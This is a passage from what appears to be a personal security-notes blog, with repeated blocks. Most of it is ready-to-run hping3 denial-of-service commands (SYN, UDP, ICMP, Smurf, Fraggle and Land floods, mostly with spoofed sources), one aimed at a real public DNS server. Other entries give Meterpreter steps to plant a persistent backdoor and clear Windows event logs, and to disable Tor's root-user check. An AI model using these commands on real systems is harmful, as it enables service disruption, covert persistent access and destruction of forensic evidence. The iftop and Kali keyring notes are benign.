-a:The Source IP or Host
Land:
hping3 -V -c 1000000 -d 120 -S -w 64 -p (Victim Port) -s (Victim Port) -k -a (Victim IP) --flood (Victim IP)
Example:
hping3 -V -c 1000000 -d 120 -S -w 64 -p 80 -s 80 -k -a demonalex.freeddns.org --flood demonalex.freeddns.org
Explanation:
-V:Verbose Mode
-c:Packet Count
-d:Data Size
-S:Syn
-w:Window Size
-p:Destination Port
-s:Source Base Port
-k:Keep the source port the same
-a:The Source IP or Host
--flood:Flood Mode
References:
http://0daysecurity.com/articles/hping3_examples.html
http://www.hackingarticles.in/dos-penetration-testing-part-1/
http://www.iv2-technologies.com/DOSAttacks.pdf
https://neelpathak.wordpress.com/tag/hping3-tutorials/
http://blognyajohny.blogspot.com/2014/04/ddos-attack-using-hping-command-in-kali.html
https://www.blackmoreops.com/2015/04/21/denial-of-service-attack-dos-using-hping3-with-spoofed-ip-in-kali-linux/
SYN Flood:
hping3 -V -c 1000000 -d 120 -S -w 64 -p (Victim Port) -s (Source Port) --flood --rand-source (Victim IP)
Example:
hping3 -V -c 1000000 -d 120 -S -w 64 -p 80 -s 1025 --flood --rand-source test.freeddns.org
Explanation:
-V:Verbose Mode
-c:Packet Count
-d:Data Size
-S:Syn
-w:Window Size
-p:Destination Port
-s:Source Base Port
--flood:Flood Mode
--rand-source:IP Spoofing
UDP Flood:
hping3 --flood --rand-source --udp -p (Victim Port) (Victim IP)
Example:
hping3 --flood --rand-source --udp -p 53 8.8.4.4
Explanation:
--flood:Flood Mode
--rand-source:IP Spoofing
--udp:UDP Mode
-p:Destination Port
ICMP Flood:
hping3 -1 --flood --rand-source (Victim IP)
Example:
hping3 -1 --flood --rand-source 192.168.0.88
-1:ICMP
--flood:Flood Mode
--rand-source:IP Spoofing
Smurf:
hping3 -1 --flood -a (Victim IP) (Broadcast IP)
Example:
hping3 -1 --flood -a 192.168.0.3 192.168.0.255
Explanation:
-1:ICMP
--flood:Flood Mode
-a:The Source IP or Host
Fraggle:
hping3 --udp --flood -p 7 -s 7 -k -a (Victim IP) (Broadcast IP)
Example:
hping3 --udp --flood -p 7 -s 7 -k -a 192.168.0.3 192.168.0.255
Explanation:
--udp:UDP
--flood:Flood Mode
-p:Destination Port
-s:Source Base Port
-k:Keep the source port the same
-a:The Source IP or Host
Land:
hping3 -V -c 1000000 -d 120 -S -w 64 -p (Victim Port) -s (Victim Port) -k -a (Victim IP) --flood (Victim IP)
Example:
hping3 -V -c 1000000 -d 120 -S -w 64 -p 80 -s 80 -k -a demonalex.freeddns.org --flood demonalex.freeddns.org
Explanation:
-V:Verbose Mode
-c:Packet Count
-d:Data Size
-S:Syn
-w:Window Size
-p:Destination Port
-s:Source Base Port
-k:Keep the source port the same
-a:The Source IP or Host
--flood:Flood Mode
References:
http://0daysecurity.com/articles/hping3_examples.html
http://www.hackingarticles.in/dos-penetration-testing-part-1/
http://www.iv2-technologies.com/DOSAttacks.pdf
https://neelpathak.wordpress.com/tag/hping3-tutorials/
http://blognyajohny.blogspot.com/2014/04/ddos-attack-using-hping-command-in-kali.html
https://www.blackmoreops.com/2015/04/21/denial-of-service-attack-dos-using-hping3-with-spoofed-ip-in-kali-linux/
Tuesday, May 22, 2018
Apply SOCKS Proxy (e.g. Tor) to Linux Shell terminal by using Proxychains
1) Turn on SOCKS Proxy such as Tor service
2) vi /etc/proxychains.conf
3) Add the following line to the end of proxychains.conf
socks5 127.0.0.1 9150
4) Execute the command below in order to verify whether the IP address has been changed
proxychains wget -qO- v4.ifconfig.co
2) vi /etc/proxychains.conf
3) Add the following line to the end of proxychains.conf
socks5 127.0.0.1 9150
4) Execute the command below in order to verify whether the IP address has been changed
proxychains wget -qO- v4.ifconfig.co
Leverage Tor as a SOCKS proxy
After the Tor Browser is executed, point the SOCKS Proxy of the underlying operating system to "127.0.0.1:9150".
P.S.: When the Tor Browser is ended up, the SOCKS Proxy service will be shut down at the same time.
P.S.: When the Tor Browser is ended up, the SOCKS Proxy service will be shut down at the same time.
Install and configure Tor
1) Download Tor Browser from https://www.torproject.org/download/download-easy.html.en
2) Move the *.tar.xz file to /usr/local/sbin
3) Execute the commands below
#cd /usr/local/sbin
#tar -xvf ./tor-browser-linux32-7.5.4_en-US.tar.xz
#cd tor-browser_en-US/Browser
#vi ./start-tor-browser
4) Comment the lines below before saving and exiting the vi
if [ "`id -u`" -eq 0 ]; then
complain "The Tor Browser Bundle should not be run as root. Exiting."
exit 1
fi
5) Run the command below
#/usr/local/sbin/tor-browser_en-US/Browser/start-tor-browser
2) Move the *.tar.xz file to /usr/local/sbin
3) Execute the commands below
#cd /usr/local/sbin
#tar -xvf ./tor-browser-linux32-7.5.4_en-US.tar.xz
#cd tor-browser_en-US/Browser
#vi ./start-tor-browser
4) Comment the lines below before saving and exiting the vi
if [ "`id -u`" -eq 0 ]; then
complain "The Tor Browser Bundle should not be run as root. Exiting."
exit 1
fi
5) Run the command below
#/usr/local/sbin/tor-browser_en-US/Browser/start-tor-browser
Monday, May 21, 2018
Some examples regarding Shodan's keywords
[Geography]
country:US
city:Guangzhou
geo:33.5,36.3
[Time]
before:01/01/2014
after:01/01/2014
[Network and System Scan]
net:216.0.0.0/16
port:443
os:"windows 2003"
[Site and Page Scan]
hostname:google.com
title:"Server Room"
[Exclusion]
-port:80
country:US
city:Guangzhou
geo:33.5,36.3
[Time]
before:01/01/2014
after:01/01/2014
[Network and System Scan]
net:216.0.0.0/16
port:443
os:"windows 2003"
[Site and Page Scan]
hostname:google.com
title:"Server Room"
[Exclusion]
-port:80
Some common use cases of Meterpreter
Install a persistent backdoor:
meterpreter>ps
When locating the explorer.exe (suppose the process ID of the explorer.exe is 623), execute the command below:
meterpreter>migrate 623
meterpreter>run metsvc
Connect to the metsvc (suppose the victim owns the IP address, 192.168.1.104):
msf>use exploit/multi/handler
msf exploit(handler)>set PAYLOAD windows/metsvc_bind_tcp
msf exploit(handler)>set LPORT 31337
msf exploit(handler)>set RHOST 192.168.1.104
msf exploit(handler)>show options
msf exploit(handler)>run
Clean all Event Log:
meterpreter>clearev
meterpreter>ps
When locating the explorer.exe (suppose the process ID of the explorer.exe is 623), execute the command below:
meterpreter>migrate 623
meterpreter>run metsvc
Connect to the metsvc (suppose the victim owns the IP address, 192.168.1.104):
msf>use exploit/multi/handler
msf exploit(handler)>set PAYLOAD windows/metsvc_bind_tcp
msf exploit(handler)>set LPORT 31337
msf exploit(handler)>set RHOST 192.168.1.104
msf exploit(handler)>show options
msf exploit(handler)>run
Clean all Event Log:
meterpreter>clearev
Sunday, May 13, 2018
Saturday, May 12, 2018
Monday, April 30, 2018
Saturday, April 21, 2018
Suggest we use iftop instead of iptraf to identify DDoS
Reference: https://www.slashroot.in/
Usage:
iftop -i INTERFACE
Example:
iftop -i eth1
The iftop automatically sorts out those network connections occupying excessive bandwidth from the top to the bottom.
The shortcut, "p", helps show the details regarding the source port and destination port for each connection.
The last three columns on the right represent the bandwidth usage for the last 2, 10, and 40 seconds.
Finally, the shortcut, "q", can help exit the program.
Usage:
iftop -i INTERFACE
Example:
iftop -i eth1
The iftop automatically sorts out those network connections occupying excessive bandwidth from the top to the bottom.
The shortcut, "p", helps show the details regarding the source port and destination port for each connection.
The last three columns on the right represent the bandwidth usage for the last 2, 10, and 40 seconds.
Finally, the shortcut, "q", can help exit the program.
Sunday, April 15, 2018
Solve the key issue happening when updating sources by using apt-get
wget -q -O - https://archive.kali.org/
Retrieved from https://www.kali.org/news/
If the commands above still does not work, please execute the commands below:
wget https://http.kali.org/kali/pool/main/k/kali-archive-keyring/kali-archive-keyring_2018.1_all.deb
apt install ./kali-archive-keyring_2018.1_all.deb
If the commands above still does not work, please execute the commands below:
wget https://http.kali.org/kali/pool/main/k/kali-archive-keyring/kali-archive-keyring_2018.1_all.deb
apt install ./kali-archive-keyring_2018.1_all.deb
Many thanks for the guidance of Frank, my coworker working at CCBNY.
Friday, April 13, 2018
Friday, March 16, 2018
Sunday, March 11, 2018
A dumb shell
#!/usr/bin/perl -w
#Path: /bin/dumb_shell.pl
#For those users with any privilege.
$|=1;
while(1){
system('clear');
print "You have logged in successfully!\n";
sleep(5);
}
#Path: /bin/dumb_shell.pl
#For those users with any privilege.
$|=1;
while(1){
system('clear');
print "You have logged in successfully!\n";
sleep(5);
}
Subscribe to:
Posts (Atom)